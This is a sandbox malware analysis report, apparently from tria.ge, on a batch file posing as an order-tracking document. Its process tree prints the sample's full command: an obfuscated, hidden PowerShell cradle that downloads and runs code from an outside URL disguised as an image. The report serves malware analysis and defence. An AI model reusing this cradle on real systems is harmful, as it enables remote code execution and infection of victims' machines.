Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
45s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
11/09/2022, 02:28
Static task
static1
Behavioral task
behavioral1
Sample
TRACK-ORDER#114-85737.bat
Resource
win7-20220812-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
TRACK-ORDER#114-85737.bat
Resource
win10v2004-20220901-en
8 signatures
150 seconds
General
-
Target
TRACK-ORDER#114-85737.bat
-
Size
65KB
-
MD5
44d81d1aecc0e4b0aa0f9ad726a02e99
-
SHA1
eebf5c17f72ee3a323619f45dd1db9d03a417c37
-
SHA256
4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
-
SHA512
6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
-
SSDEEP
192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 768 powershell.exe 5 768 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 768 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1848 wrote to memory of 968 1848 cmd.exe 29 PID 1848 wrote to memory of 968 1848 cmd.exe 29 PID 1848 wrote to memory of 968 1848 cmd.exe 29 PID 968 wrote to memory of 768 968 cmd.exe 30 PID 968 wrote to memory of 768 968 cmd.exe 30 PID 968 wrote to memory of 768 968 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)2⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-